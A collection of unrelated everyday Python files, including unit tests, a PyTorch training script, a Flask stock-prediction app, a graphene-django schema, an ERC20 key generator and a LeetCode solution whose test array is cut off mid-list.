import mock import testtools from shakenfist.baseobject import DatabaseBackedObject, State from shakenfist import exceptions from shakenfist.tests import base class DatabaseBackedObjectTestCase(base.ShakenFistTestCase): @mock.patch('shakenfist.baseobject.DatabaseBackedObject._db_get_attribute', side_effect=[ {'value': None, 'update_time': 2}, {'value': DatabaseBackedObject.STATE_INITIAL, 'update_time': 4}, {'value': DatabaseBackedObject.STATE_CREATED, 'update_time': 10}, ]) def test_state(self, mock_get_attribute): d = DatabaseBackedObject('uuid') self.assertEqual(d.state, State(None, 2)) self.assertEqual(d.state, State(DatabaseBackedObject.STATE_INITIAL, 4)) self.assertEqual(d.state, State( DatabaseBackedObject.STATE_CREATED, 10)) def test_property_state_object_full(self): s = State('state1', 3) self.assertEqual(s.value, 'state1') self.assertEqual(s.update_time, 3) self.assertEqual(s.obj_dict(), { 'value': 'state1', 'update_time': 3, }) self.assertEqual(s, State('state1', 3)) self.assertEqual(str(s), "State({'value': 'state1', 'update_time': 3})") @mock.patch('shakenfist.baseobject.DatabaseBackedObject._db_set_attribute') @mock.patch('shakenfist.baseobject.DatabaseBackedObject._db_get_attribute', side_effect=[ None, {'message': 'bad error'}, {'value': DatabaseBackedObject.STATE_INITIAL, 'update_time': 4}, {'value': DatabaseBackedObject.STATE_ERROR, 'update_time': 4}, {'message': 'real bad'}, ]) def test_property_error_msg(self, mock_get_attribute, mock_set_attribute): d = DatabaseBackedObject('uuid') self.assertEqual(d.error, None) self.assertEqual(d.error, 'bad error') with testtools.ExpectedException(exceptions.InvalidStateException): d.error = 'real bad' d.error = 'real bad'
python
from .base import * import scipy.io from os import path as pth class Food(BaseDataset): def __init__(self, root, classes, transform = None): BaseDataset.__init__(self, root, classes, transform) img_dir = pth.join(root,"images") category_path = pth.join(root,"categories.txt") with open(category_path,"r") as f: categories = f.read().split() cat2class = {cat:i for i,cat in enumerate(categories)} img_paths = [os.path.join(dp, f).replace("._","") for dp, dn, filenames in os.walk(img_dir) for f in filenames if os.path.splitext(f)[1] == '.jpg'] ys = [cat2class[img_path.split("/")[-2]] for img_path in img_paths] index = 0 for im_path, y in zip(img_paths, ys): if y in classes: # choose only specified classes self.im_paths.append(os.path.join(root, im_path)) self.ys.append(y) self.I += [index] index += 1
python
"""Get debug information.""" from googledevices.helpers import gdh_session def debug(host, loop, test, timeout): """Get debug information.""" from googledevices.utils.debug import Debug async def connectivity(): """Test connectivity a Google Home unit.""" async with gdh_session(): googledevices = Debug(host) await googledevices.connectivity(timeout) if test == "connectivity": loop.run_until_complete(connectivity())
python
from database.connect import DatabaseError from flask import Flask, request, render_template, jsonify import json from database import Database from src.predict import * app = Flask(__name__) def pipeline(ticker, years): """Converts user input to appropriate types""" ticker = str(ticker) years = int(years) return ticker, years def error_check()->str: """Checks for errors and outputs a string""" if (KeyError, json.JSONDecodeError, AssertionError, ValueError): return json.dumps({"error": "Check input"}), 400 else: return json.dumps({"error": "Prediction Failed"}), 500 def clean_final_price(prediction:float)->float: """Converts the output from a tuple to a float""" price = np.round(prediction, decimals=2) string_price = " ".join(map(str, price)) final_price = float(string_price) return final_price def get_database_data(query, args=(), one=False): """Gets data from the postgres database hosted on heroku""" cursor = Database().connect() cursor.execute(query, args) r = [dict((cursor.description[i][0], value)\ for i, value in enumerate(row)) for row in cursor.fetchall()] cursor.close() return (r[0] if r else None) if one else r def insert_data(ticker:str, years: int, final_price:float): """Connects to the postgres database and reads database""" try: cursor = Database().connect() cursor.execute("INSERT INTO Data (ticker_name, years_analysed, Future_price)\ VALUES (%s, %s, %s)" ,(ticker, years, final_price)) cursor.close() except DatabaseError: raise DatabaseError("Unable to add data") @app.route("/") def home(): """Renders initial template for the app""" return render_template("index.html") @app.route('/predict', methods = ["POST"]) def predict_output()->str: """Takes in form data from user and returns future price and accuracy of prediction""" try: ticker = request.form.get('Stock Ticker Name') years = request.form.get('Number of years', type=int) val = predict_future_price(ticker,years) prediction = val[0] lr_confidence = round(val[1] * 100,2) final_price = clean_final_price(prediction) insert_data(ticker, years, final_price) return render_template("index.html", prediction_text="{} price tomorrow will be ${:.2f} with a \ confidence of {}%".format(ticker,final_price, lr_confidence)) except: return error_check() @app.route('/results', methods = ["POST"]) def results_json(): """Takes in form data from user and returns future price and accuracy of prediction in json format""" data = request.get_json() ticker = data[0] years = data[1] ticker,years = pipeline(ticker, years) pred = predict_future_price(ticker,years) predicted_price = pred[0] final_price = clean_final_price(predicted_price) return json.dumps({"Predicted future Price in Dollars":final_price}) @app.route('/read_database', methods = ["GET"]) def output(): """Prints out the first 10 rows in the database""" my_query = get_database_data("SELECT * FROM Data LIMIT %s", (10,)) json_output = json.dumps(my_query, default=str) return json_output if __name__ == "__main__": app.run(debug=True)
python
import pandas as pd import numpy as np import config import utils import torch import torch.nn as nn import torch.nn.functional as F from pathlib import Path from tqdm.auto import tqdm from sklearn.metrics import roc_auc_score from datetime import datetime from torch.utils.data import DataLoader, Dataset from torch.utils.tensorboard import SummaryWriter class PlaygroundData(Dataset): def __init__( self, data=None, path=None, ): if data is not None: self.data = data else: self.data = pd.read_csv(path) self.catcol_names = [col for col in self.data.columns if col.endswith("le")] self.contcol_names = [ col for col in self.data.columns if col.startswith("cont") ] self.features = self.catcol_names + self.contcol_names self.device = ( torch.device("cuda") if torch.cuda.is_available() else torch.device("cpu") ) self.catcols = torch.tensor( self.data[self.catcol_names].values, device=self.device, dtype=torch.long ) self.contcols = torch.tensor( self.data[self.contcol_names].values, device=self.device, dtype=torch.float32, ) self.target = torch.tensor( self.data.target.values, device=self.device, dtype=torch.long ) def __len__(self): return len(self.data) def __getitem__(self, idx): x_cat = self.catcols[idx, :] x_cont = self.contcols[idx, :] y = self.target[idx] return x_cat, x_cont, y @classmethod def from_df(cls, df): return cls(data=df) @staticmethod def embed_dim(n): """ Calculates the embedding dimension given the number of categories """ return int(min(np.ceil(n / 2), 50)) def embedding_sizes(self): sizes = [] for col in self.catcol_names: nunique = self.data[col].max() emb_dim = self.embed_dim(nunique) sizes.append((nunique + 1, emb_dim)) return sizes class PlaygroundModel(nn.Module): def __init__(self, embedding_sizes, n_cont): super(PlaygroundModel, self).__init__() self.embeddings = nn.ModuleList( [ nn.Embedding(num_embedding, embedding_dim) for num_embedding, embedding_dim in embedding_sizes ] ) self.n_emb = sum(emb.embedding_dim for emb in self.embeddings) self.emb_fc = nn.Linear(self.n_emb, self.n_emb) self.n_cont = n_cont cont_fc_dim = 512 self.emb1 = nn.Linear(self.n_emb, self.n_emb) self.cont1 = nn.Linear(n_cont, cont_fc_dim) self.cont2 = nn.Linear(cont_fc_dim, cont_fc_dim) self.cont3 = nn.Linear(cont_fc_dim, cont_fc_dim) self.cont4 = nn.Linear(cont_fc_dim, cont_fc_dim) self.fc1 = nn.Linear(self.n_emb + cont_fc_dim, 128) self.fc2 = nn.Linear(128, 128) self.fc3 = nn.Linear(128, 2) self.emb_bn = nn.BatchNorm1d(self.n_emb) self.bn1 = nn.BatchNorm1d(self.n_cont) self.bn2 = nn.BatchNorm1d(cont_fc_dim) self.bn3 = nn.BatchNorm1d(128) self.emb_drops = nn.Dropout(0.3) self.drops = nn.Dropout(0.3) def forward(self, x_cat, x_cont): x = [emb(x_cat[:, i]) for i, emb, in enumerate(self.embeddings)] x = torch.cat(x, dim=1) x = self.emb_drops(x) x = self.emb1(x) x = F.relu(x) x = self.emb_bn(x) x_cont = self.bn1(x_cont) x_cont = self.cont1(x_cont) x_cont = F.relu(x_cont) x_cont = self.cont2(x_cont) x_cont = F.relu(x_cont) x_cont = self.bn2(x_cont) x_cont = self.cont3(x_cont) x_cont = F.relu(x_cont) x_cont = self.cont4(x_cont) x_cont = F.relu(x_cont) x = torch.cat([x, x_cont], 1) x = F.relu(x) x = self.fc1(x) x = F.relu(x) x = self.fc2(x) x = F.relu(x) x = self.bn3(x) x = self.fc3(x) return x def predict_proba(self, x_cat, x_cont): x = self.forward(x_cat, x_cont) return nn.Softmax(-1)(x) def fold_split(df, fold): train = PlaygroundData.from_df(df.loc[df.kfold != fold]) valid = PlaygroundData.from_df(df.loc[df.kfold == fold]) return train, valid def train_loop(train_dl, model, optimizer, criterion, epoch, writer=None): model.train() training_loss = utils.AverageMeter(name="loss") with tqdm(train_dl, unit="batch") as tepoch: for batch in tepoch: optimizer.zero_grad() tepoch.set_description(f"Epoch {epoch}.") x_cat, x_cont, y = batch outputs = model(x_cat, x_cont) loss = criterion(outputs, y) loss.backward() optimizer.step() training_loss.update(loss.item(), n=x_cat.shape[0]) tepoch.set_postfix(Loss=training_loss.avg) if writer is not None: writer.add_scalar("Loss/train", training_loss.avg) def eval_loop(valid_dl, model, writer=None): model.eval() valid_auc = utils.AverageMeter(name="AUC") with torch.no_grad(): with tqdm(valid_dl, unit="batch") as vepoch: for batch in vepoch: vepoch.set_description(f"Validation") x_cat, x_cont, y = batch batch_proba = ( model.predict_proba(x_cat, x_cont).detach().cpu().numpy()[:, 1] ) auc_score = roc_auc_score(y.cpu().numpy(), batch_proba) valid_auc.update(auc_score, n=x_cat.shape[0]) vepoch.set_postfix(AUC=valid_auc.avg) if writer is not None: writer.add_scalar("AUC", valid_auc.avg) return valid_auc def now(): return datetime.now().strftime("%Y-%m-%d_%H:%M") def run(fold, epochs=10, bs=512, lr=1e-3, lr_decay=0.99, start_time=0): df = pd.read_csv(config.TRAIN_DATA) device = torch.device("cuda") if torch.cuda.is_available() else torch.device("cpu") train, valid = fold_split(df, fold) train_dl = DataLoader(train, batch_size=bs, shuffle=True) valid_dl = DataLoader(valid, batch_size=4096, shuffle=False) model = PlaygroundModel(train.embedding_sizes(), 11) model = model.to(device) optimizer = torch.optim.Adam(model.parameters(), lr=lr) criterion = nn.CrossEntropyLoss() scheduler = torch.optim.lr_scheduler.LambdaLR( optimizer, lambda epoch: lr_decay * epoch ) # Logging setup params = f"bs={bs}_lr={lr}_lr-decay={lr_decay}__{start_time}" writer = SummaryWriter(log_dir=config.LOG_DIR / params / f"Fold={fold}") for epoch in range(epochs): train_loop(train_dl, model, optimizer, criterion, epoch, writer=writer) auc = eval_loop(valid_dl, model, writer=writer) scheduler.step() model_export_path = config.MODEL_DIR / params model_export_path.mkdir(parents=True, exist_ok=True) torch.save(model, model_export_path / f"Fold={fold}_AUC={auc.avg}.pth") if __name__ == "__main__": start_time = now() for fold in range(10): run(fold, start_time=start_time)
python
import graphene from graphene import Argument from graphene_django.types import DjangoObjectType from ..models import Category, Product class ProductType(DjangoObjectType): class Meta: model = Product class Query(object): all_products = graphene.List(ProductType) product = graphene.Field(ProductType, id=graphene.ID()) def resolve_all_products(self, info, **kwargs): # Querying a list of products return Product.objects.all() def resolve_product(self, info, id): # Querying a single product return Product.objects.get(pk=id) class CreateProduct(graphene.Mutation): class Arguments: name = graphene.String() price = graphene.Float() category = graphene.List(graphene.ID) in_stock = graphene.Boolean() date_created = graphene.types.datetime.DateTime() product = graphene.Field(ProductType) def mutate(self, info, name, price=None, category=None, in_stock=True, date_created=None): product = Product.objects.create( name=name, price=price, in_stock=in_stock, date_created=date_created ) if category is not None: category_set = [] for category_id in category: category_object = Category.objects.get(pk=category_id) category_set.append(category_object) product.category.set(category_set) product.save() return CreateProduct( product=product ) class UpdateProduct(graphene.Mutation): class Arguments: id = graphene.ID() name = graphene.String() price = graphene.Float() category = graphene.List(graphene.ID) in_stock = graphene.Boolean() date_created = graphene.types.datetime.DateTime() product = graphene.Field(ProductType) def mutate(self, info, id, name=None, price=None, category=None, in_stock=None, date_created=None): product = Product.objects.get(pk=id) product.name = name if name is not None else product.name product.price = price if price is not None else product.price product.in_stock = in_stock if in_stock is not None else product.in_stock product.date_created = date_created if date_created is not None else product.date_created if category is not None: category_set = [] for category_id in category: category_object = Category.objects.get(pk=category_id) category_set.append(category_object) product.category.set(category_set) product.save() return UpdateProduct(product=product) class DeleteProduct(graphene.Mutation): class Arguments: id = graphene.ID() product = graphene.Field(ProductType) def mutate(self, info, id): product = Product.objects.get(pk=id) if product is not None: product.delete() return DeleteProduct(product=product) class Mutation(graphene.ObjectType): create_product = CreateProduct.Field() update_product = UpdateProduct.Field() delete_product = DeleteProduct.Field()
python
import os PROJECT_NAME = "fastapi sqlalchemy pytest example" VERSION = "0.0.1" BASE_DIR: str = os.path.dirname(os.path.dirname(os.path.abspath(__file__))) API_PREFIX = "/api" SQLALCHEMY_DATABASE_URL: str = os.getenv('DATABASE_URI', f"sqlite:///{BASE_DIR}/foo.db") DEBUG=True
python
""" MIT License Copyright (c) 2018 Simon Olofsson Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions: The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software. THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE. """ import numpy as np def laplace_approximation (model, Xdata): # Dimensions E = model.num_outputs D = model.dim_p meas_noise_var = model.meas_noise_var if isinstance(meas_noise_var, (int, float)): meas_noise_var = np.array([meas_noise_var] * E) # Invert measurement noise covariance if meas_noise_var.ndim == 1: imeasvar = np.diag(1./meas_noise_var) else: imeasvar = np.linalg.inv(meas_noise_var) # Inverse covariance matrix iA = np.zeros( (D, D) ) for e1 in range(E): dmu1 = model.d_mu_d_p(e1, Xdata) assert dmu1.shape == (len(Xdata),D) iA += imeasvar[e1,e1] * np.matmul(dmu1.T, dmu1) if meas_noise_var.ndim == 1: continue for e2 in range(e1+1,E): if imeasvar[e1,e2] == 0.: continue dmu2 = model.d_mu_d_p(e2, Xdata) assert dmu2.shape == (len(Xdata),D) iA += imeasvar[e1,e2] * np.matmul(dmu1.T, dmu2) iA += imeasvar[e2,e1] * np.matmul(dmu2.T, dmu1) Sigma = np.linalg.inv(iA) return Sigma
python
from secrets import token_bytes from coincurve import PublicKey from sha3 import keccak_256 import os private_key = keccak_256(token_bytes(32)).digest() public_key = PublicKey.from_valid_secret(private_key).format(compressed=False)[1:] addr = keccak_256(public_key).digest()[-20:] def clear(): if os.name == 'nt': os.system("cls") else: os.system("clear") def generate(p,a): print('ERC20 ADDRESS: 0x' + a.hex().upper()) print('PRIVATE KEY:', p.hex()) pass def ui(): #clear() choices = { '1' : '1', '2' : '2' } print("1. Generate an address for me\n2. Generate 'n' addresses for me (BROKEN)") ad = 'invalid' id = ad while id == ad: id = input('\nSelect an option from above : ') id = choices.get(id,'invalid') if id == '1': generate(private_key,addr) exit() elif id == '2': n = input("Enter number of addresses to generate - ") n = int(n) ini = 1 while(ini <= n): print(f'\n{ini}') generate(private_key,addr) print('\n') ini++1 if __name__ == "__main__": ui()
python
#!/usr/bin/env python """ Stackfuck Interpreter """ try: from setuptools import setup except ImportError: from distutils.core import setup with open("README.md") as file_readme: readme = file_readme.read() setup( name="Stackfuck", version="0.0.1", description="Interpreter for esoteric language Stackfuck", long_description=readme, author="fxcqz", license="MIT", url="https://github.com/fxcqz/stackfuck", packages=["stackfuck", "stackfuck.tests"], test_suite="stackfuck.tests", )
python
import collections from typing import List class Solution: def longestSubsequence(self, arr: List[int], difference: int) -> int: longest = 0 while arr: new_arr = [] curr = [arr[0]] for j in arr[1:]: if j == curr[-1] + difference: curr.append(j) else: new_arr.append(j) longest = max(longest, len(curr)) arr = new_arr return longest s = Solution() print(s.longestSubsequence( [-4709, 1448, -1257, 4598, 2311, 6228, 3829, -4684, -8278, -7636, 7913, -7342, 1670, 2116, 3460, -8560, -4155, 3070, -9452, -7215, 4565, 7825, 4601, -1013, 3732, -7471, 7583, -483, -3412, -188, -4655, -3070, -388, -7627, -9766, 3435, 2020, 1197, 7488, -8933, 2644, -7940, -8402, 8958, 6650, -3969, -7151, -5517, 3830, -8448, 4446, 9795, 7488, -9350, -6877, -2486, 6214, 6571, -277, 1115, -6043, -3621, -9113, 6354, -9422, 2419, 1637, -575, 1460, -8081, -5410, -3892, 5413, -1023, 608, 4458, 5174, -490, -3303, -4492, 9000, -8352, -8461, 488, 3191, -1528, 5744, 3310, 5587, -9893, -7351, 513, -6660, -469, 2829, 841, -3223, -7590, 1544, -1795, -6459, 6659, 3279, 4445, 9445, 3403, -3403, 2889, -7284, 6069, 3024, -6947, 7917, -3405, 5677, 9607, 1869, -2986, -3407, 9536, -5075, 580, -1208, -248, 980, 3446, -2320, 6963, -8211, 3708, -893, 9593, -4945, 8972, -9142, -6414, -6773, -4083, -3792, 8349, -7084, -9620, -2721, -1257, -6448, -9753, 4889, 3733, 3368, 3527, 9779, 8761, -5170, 9375, 7239, -1010, 4157, -1155, 5556, 992, -5933, 7261, -7059, -6312, 2830, -5440, 129, 2901, 9500, -4129, -7206, 3708, 2940, 5277, 7773, -9664, 5727, 7776, -9528, -3930, -7685, -1243, -7587, 3638, 9107, -8318, -8078, -5356, 5966, 9246, 7703, -9911, 1621, 121, 2409, 5622, 8582, 6139, -1476, -2701, 2907, 1779, 2702, -170, -3909, 2036, -7867, -2955, 9180, 3116, 4323, 2781, 9846, -6182, -3332, 4726, 8310, -9307, 2641, -2339, 705, -9747, -1631, 7808, 7917, -8777, -531, 5146, -7711, -5208, 3474, 2491, -6882, -4108, 9526, -3541, 4025, -1819, -1076, -72, -8129, -4862, -8355, 6062, -7891, -5696, 8372, 7898, 6162, -8518, -8833, 1739, -7341, 7530, 3074, 942, 6720, -6625, -9643, -6649, 259, 9817, 2433, 5870, 8184, 4353, -2014, 7997, 7739, -5667, -8209, -7162, 245, 5188, -8214, -2355, -7020, -8891, -5942, -5327, 4809, -306, 6819, -9023, -5268, 9635, 3614, -1443, -8312, 7840, -9199, -4160, -7231, 10000, -4129, -3659, -9998, 6559, 6409, 8763, -6636, 2771, -488, 6804, 5620, 3664, 8026, 2376, -3457, 8554, -89, -5125, -9724, -3366, -2702, -6066, 8296, 7410, 6824, 4988, 9071, 6914, 9276, 6043, 2662, 7115, -4578, -8617, -7335, -964, -7557, 9924, 488, -8370, 3897, -38, 4336, 6112, -3455, 5428, 7243, 2333, -8722, 5104, 413, 7555, 4749, -8682, -6122, -656, 9799, 8416, 451, 8667, 9519, 9217, 9817, -2593, 1300, 6786, 6907, 3494, -542, 9995, -8002, 4034, -2933, 8060, -7683, 4554, -9981, -9417, -9423, 2638, 2921, -7685, 1108, -5852, -1783, -4529, -2147, 7936, -9052, 3322, 8007, -1030, 4437, 8965, -9005, -8383, -9961, 6518, 1647, -2948, -6817, 6393, -1632, -9250, 4736, -7501, 8300, -4926, 2619, -5473, -8944, -8821, 304, -4149, -3717, -5004, 5236, 5331, 8158, -1757, -9958, 7922, -2741, 4430, -5353, -5451, 3250, -8880, 8006, 9616, 4494, -9642, -1394, -6912, -6869, -9656, 8026, -9579, -9877, 7094, -4203, -2398, -8318, 5133, 6332, 1384, 494, 5527, 8787, -6738, 6688, 2507, -7504, -1109, 9776, 2807, -1831, 4933, 657, -4074, -1011, -4495, 520, -6128, -5797, 1837, 5828, -1960, -8015, 7320, 5355, 2650, 726, 1965, -9164, -8873, 3261, -7807, -9111, -2413, -2115, 6335, -1093, 8633, 3629, 8277, 4634, -8993, -5630, -9605, 7405, 1782, 6622, -7604, -5880, -917, -4820, -3689, -4483, -284, 4958, 3882, 7889, 2905, 9626, -5559, 3435, 8242, -5286, -516, -3719, -1154, 1668, 9176, 5154, -6463, -3364, -979, 7309, 3322, 5021, 9550, -8908, 5085, 8331, 7952, 6074, -2253, 4396, -5380, -9189, 3223, -4308, 1212, 3032, 6347, -6317, 2861, -4154, 9149, -2758, -9855, -8963, 1890, -9606, -1216, 8010, 637, 4365, -9354, 5176, 8474, 1659, 768, -5205, -770, 9589, -7571, 5125, 5837, -9558, -4537, 6896, -7652, -2943, 1316, 4582, -198, 9142, 6411, -41, 8773, 5411, -1285, -1824, -9744, 4404, 2719, -8671, -3681, 9716, -5632, 4429, -4761, 2358, 3520, -6327, 1633, 8015, -1815, 6403, -3818, 3746, -6403, -1294, 4912, 6685, 3684, -1035, -7266, 1987, 6955, 3018, 7430, 8932, 9808, 3514, -9019, 5290, -5177, -6093, 290, -9207, 3142, 4522, -9122, -2146, -8903, -1348, 4125, -9822, -4029, 4013, 2378, -8450, 3157, -9729, 1347, 2085, -4061, 3203, 6418, -5592, -1225, -9488, 3559, -2217, 3015, 8960, 2835, 6413, -7880, -8973, -1225, -1171, 9117, -5936, 4005, -4974, -776, 3043, 9985, 5995, 6581, -429, -8248, 1293, 9981, 5487, 8339, -3930, -5052, -376, 9108, 6872, -4535, 1747, -9142, -6569, 9267, -9290, 3851, 5485, 8509, -5944, -8435, 1394, -8924, 5500, -3134, 9397, -3570, -7074, 3827, 8912, 8134, 5038, -3879, -5094, 3, -7461, -4811, -9405, 7899, 788, 3814, -8040, 8530, -2633, 43, 6070, -6987, 2199, -2448, 676, -3468, -2566, -7342, 6049, -3039, -1556, -8875, -9553, 9159, 7792, 1288, 7967, -200, 6841, -2402, -7982, 2614, 5536, 4100, -7524, 4240, 998, 859, -8681, -5001, -5542, -309, -1653, 2684, 1328, 6442, -9246, 8977, 7292, -4323, -9843, -8219, -2550, 4736, -6849, 9061, -6359, -665, 2210, -263, 660, -170, 6045, 2038, -549, -129, 6783, 5636, 9825, 8931, 6366, 7108, 640, -5980, -1275, -2785, 4697, 7641, -9532, -2010, 6593, 9389, 728, -7097, -4283, -3760, -6218, 2184, 3213, 31, 4997, -3436, -4727, -8695, -3450, 7325, 85, -1728, 5010, 4256, 2607, -4658, 2060, -927, -6976, 3214, 6564, 9284, 3024, 900, -2644, -874, 4318, 7622, -2623, -1426, -6074, 8294, -3986, -2914, 7753, 4737, -2478, -786, 7980, -9230, 3400, -9920, -759, 8058, 246, 437, -4812, -2885, -8218, -4786, -7828, -8665, 9821, -4247, 4283, -2205, 6371, 2315, 7116, -454, 6784, 2777, 8890, 8459, 8155, 725, 777, -8088, 1437, -5434, -3115, -8566, -891, -1654, -6168, 9589, -7939, -7748, 8647, -694, -4824, -1291, -4235, -1338, 3030, -3429, 9486, -25, -5147, 2814, 9259, 8765, 3029, 5380, -6268, -6878, -967, -1174, 319, 9548, -634, -1840, -4334, 4751, -3335, -5208, 638, 8224, -5889, 5152, -2366, 6037, -1066, -4975, 8739, 4008, 7824, 3954, -7877, -8843, 9708, 3499, -5265, -3039, 1240, -6634, -625, 2702, 9030, -3655, -9490, 5672, -352, 4609, 4356, 1731, 8429, -2424, 9220, 1151, 4066, 6619, -7982, -3933, 294, 7907, -1409, -6071, 5547, -255, 5029, -7486, -8510, -8851, -7929, 7281, -207, 1495, 366, -144, -1001, 4478, 6102, 1412, -2898, -2606, -6206, 2920, 7299, -2457, -9020, -7589, 7699, 3010, 6810, 7656, 6084, 9279, -3465, -8003, 4610, 2807, -2634, 7292, 6429, -7095, 6066, 3159, 1721, -5444, -145, -882, -2885, -9185, 9008, 620, 9239, -1186, -567, -918, -1701, 3757, 8098, 1357, 5820, -2758, -4380, 6664, 6713, -8692, -2601, -4051, 7138, 5088, -9675, -3855, -3009, 7911, 5574, 1560, -4121, 3269, 5266, 3426, -6081, -1652, -7358, 2256, -3427, -5878, -3924, 2937, -9046, -7598, -9827, -9663, -8404, 2784, 3888, -610, 905, 7876, -373, -8477, 8437, -7928, 1564, 9288, 1807, 5044, 9669, -401, 272, -6746, 626, 1971, 4241, 7787, -8591, -8955, 7588, 4012, -8150, 9363, -6599, 9564, 7694, -1627, 1288, 9129, -1191, -8963, -1718, 7460, -5561, 2449, -5504, -4461, 5187, -4088, 4001, 7739, 1299, 2651, 9696, -3710, -3549, -2138, -2675, -4004, 5411, 3864, -2566, -9291, -2027, -5138, 2970, -2812, 1497, 3242, 8503, -5509, -4424, -8518, -9314, -4412, -8000, 4395, 1387, -2608, -9404, -9096, 6605, -4413, 8549, 7, 4192, -527, 8057, -9034, -4355, 7956, -5023, 6919, 7367, 7737, -4815, -9964, -5717, -4719, 7770, -2610, -5969, 9258, 4089, -3529, -2766, -190, 3289, 1234, -5751, -8941, -3098, 2584, 1663, -5666, -2675, 7781, -9900, -1863, 1727, 6952, 2137, 3451, -3909, 259, 350, 6907, 6442, 3051, 8895, -9687, -4702, 8234, -6741, -5075, 1858, -7043, -7882, -2434, 5137, 4036, 9150, 6638, -3072, 7424, 3318, -3980, -9749, 5917, -4504, -4461, 3984, -8983, 6374, -3966, -6375, 4745, 843, 7901, 2825, 5987, -8364, 7899, -6368, 180, -4068, 1500, 7444, -4644, 4731, -5273, 3498, 8269, 643, -7033, 5360, -5054, -9014, 1313, 7885, 1448, -49, 6594, -3442, -4720, -2181, -6717, 1378, 8827, 5888, -8562, -9778, 9421, 5126, 6110, -58, -6024, 6442, -9477, -7224, -2481, -6362, -9408, 9917, -8945, -992, 4457, -1148, 4830, -1110, -7839, 2098, -5261, 3549, -8518, -9555, -3083, 2000, 8815, -292, -5987, 655, -7360, 7671, 645, -8999, -2520, -7052, -3248, -7012, 1957, 8945, -6642, -7345, -8624, -8568, -1462, -6057, 6725, 9096, -5468, 1824, 2962, 1738, 4619, -1889, 3567, -155, 4623, 1238, -7897, -4356, 9699, 1602, 5414, -2394, -6177, 5652, -637, -1645, -747, -7941, 5994, -6389, -644, -478, 8994, 9650, -123, -9940, 7874, 4177, -3178, 4001, -9822, -8294, 440, -4747, 1762, -8029, -2566, 5717, -8218, 6052, -5718, -5061, 5019, 1541, -9317, -9392, -5829, 6118, 2667, 5113, 8223, -6261, -942, -4486, -8333, -7957, 4260, 1786, 4341, -971, 1912, 1840, 2190, 954, 2573, -1681, -1770, 3492, 5185, -4394, 5479, 716, 4412, 7870, 2262, 9593, 4831, -1956, 7558, 7756, 4552, -9911, 900, 8054, -2042, -166, -1248, 2712, -8324, -9749, -1068, 4483, 5120, 1969, 4497, -9528, -536, -4279, -1122, 8989, 3259, -591, -4866, 6880, -7897, 181, 1325, -8423, 876, 4349, 2208, -3045, -2551, -2298, -3799, 1936, 3092, 4812, 6186, -6627, 2046, -5131, -8042, 5631, 3535, 6381, -4253, 3481, 7519, 972, 7013, -5740, -8068, 2879, -217, -1417, 9387, 9966, 8080, 3158, 6203, 6240, -2713, 1884, -5939, -4887, -6618, 7425, -8497, 4287, -6589, -4300, 1035, -3693, 7126, 9102, -5614, -6425, 4476, 4662, -325, 3970, -3664, -2163, 6273, 3889, 8480, -6845, 7425, -3098, 6383, -1288, -6481, 9873, 8866, -591, 5380, 9193, 9553, 8092, 1183, 1457, -3960, 4253, 1943, 4415, -8323, 8303, 4307, -2137, -8408, -1753, -208, 9669, 9167, 2623, -1142, 7395, -7398, -5218, -3102, 5735, 3623, 6257, 4699, 426, -5895, 8313, 3859, 3961, -7965, -6928, -1932, 3451, -3362, -1369, -489, 1304, -1343, 4707, 7193, -7753, 3547, -1451, -3487, 6616, 8042, -912, -6465, -3125, 8710, -8028, 9719, 5693, 2720, -7706, 9292, 8804, -3015, 1413, -9497, -5327, 5406, -1449, 6340, -1689, 1891, 8171, 8015, 540, 1191, 819, -5744, 9290, -5247, 7400, 6063, -5408, -5324, 8986, 6735, -8343, -6501, 7963, -8668, 3331, -2616, -7172, -8196, -3019, 714, 572, -4689, -2472, 4206, -3645, -1107, -7949, 3429, -64, 3739, -8236, -5070, -5133, -6350, 2155, -5517, 6685, 987, -5310, 9282, 284, -9210, -1091, -1347, -5184, -8684, 9773, -6810, 7466, -3282, 4001, 9450, 5968, -1599, -516, 2176, -2029, 6823, 3910, -2173, -1042, -5468, 1710, -3974, -4011, 7759, -3485, -266, 3886, 4835, 2717, -5427, -1232, -3525, 342, -7966, -9842, 7548, -2890, -5707, 2010, -6778, 1642, 1991, -4051, 8570, -3623, 7138, 3435, -8848, -2358, 6650, 9115, -4508, 2882, 8469, -8121, -290, -8855, 6625, 3954, -5537, -2802, -8393, -2011, -8629, -3461, -8266, 8927, -4676, 7658, 7795, 6854, -3796, -1128, -2940, 8329, 1562, -9829, 9086, 4208, -7139, -2379, 2266, 7983, -4268, -5394, 6151, -5413, 1749, -4346, -2068, 8863, 8991, -5901, -1389, 2680, -1648, 3014, 3005, -1224, 953, 5001, -9863, 6064, -3488, -1015, 5229, -1976, 4307, -9949, 4464, -2058, 6839, -6000, -9476, -449, -6840, -7549, 212, -4991, 5621, -269, -3404, -688, 5052, -701, -6309, -6035, -7136, -5859, 658, -8622, 3150, -5887, -3341, 4979, -6343, 7684, 8373, -4214, -6412, -7742, -9240, -9574, 1978, 707, 2173, -726, 9488, 7282, -8101, -5990, 2744, -2166, -4437, -7672, -8960, 8424, 1895, -1712, 7218, -31, 2070, 268, -9313, 9254, 1536, -7259, -4871, 8532, 625, -9806, 832, 2738, -1064, 1621, -6821, 1162, 5196, -7886, -2875, -7165, 9121, 8738, 9273, -9357, 8578, -7485, 9783, 5134, 5681, -9362, -1788, -1010, -9032, -7000, 7273, -6594, -5104, 6975, 8398, 9303, 17, 4784, 4368, -8066, -231, 8454, 4459, 142, 8281, 2416, -6821, -5765, 6961, 798, -6964, 4583, 1212, -8565, 6044, 1254, 7569, -1314, 2365, 8617, -821, -8077, 9027, -6976, -4598, 2315, -1985, 6930, -4988, 7108, -3738, -6063, 8643, 3997, -1938, -3852, -6372, -4838, -2186, 646, -6950, 1343, -8956, 4150, 